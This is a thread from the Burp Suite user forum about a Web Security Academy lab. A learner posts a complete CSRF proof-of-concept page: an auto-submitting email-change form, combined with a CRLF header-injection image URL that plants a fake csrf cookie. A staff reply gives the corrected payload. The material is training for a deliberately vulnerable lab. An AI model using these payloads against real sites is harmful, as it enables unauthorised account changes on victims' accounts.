Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab Solution not working

Dominik | Last updated: Oct 19, 2022 02:57PM UTC

Hi! I'm currently doing the burp academy and therefore a lot of labs. I'm trying to do the CSRF Duplicated in Cookie-Lab and it seems to be bugged? I tried it on my own and with the solution, when I test it the email gets changed and it works well. But if I send it to the victim, the lab doesn't get solved. Is there a known problem or am I doing something wrong? I followed the steps from the solution and from a video tutorial (where it worked) exactly. A colleague of mine also looked into it and didn't find a problem with my solution. Link to the lab: https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie My solution (csrf html): <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://ID.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="anything%40web-security-academy.net" /> <input type="hidden" name="csrf" value="fake" /> <input type="submit" value="Submit request" /> </form> <img src="https://ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html> I also tried a real csrf token (regarding the size and copied one) just in case the "fake" doesn't work (even though its in the solution). Thanks for your help!

Michelle, PortSwigger Agent | Last updated: Oct 19, 2022 04:28PM UTC

Thanks for getting in touch to raise this with us. If you add a ; after csrf=fake that should help. <img src="https://ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None" onerror="document.forms[0].submit();"/> Let me know how you get on :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.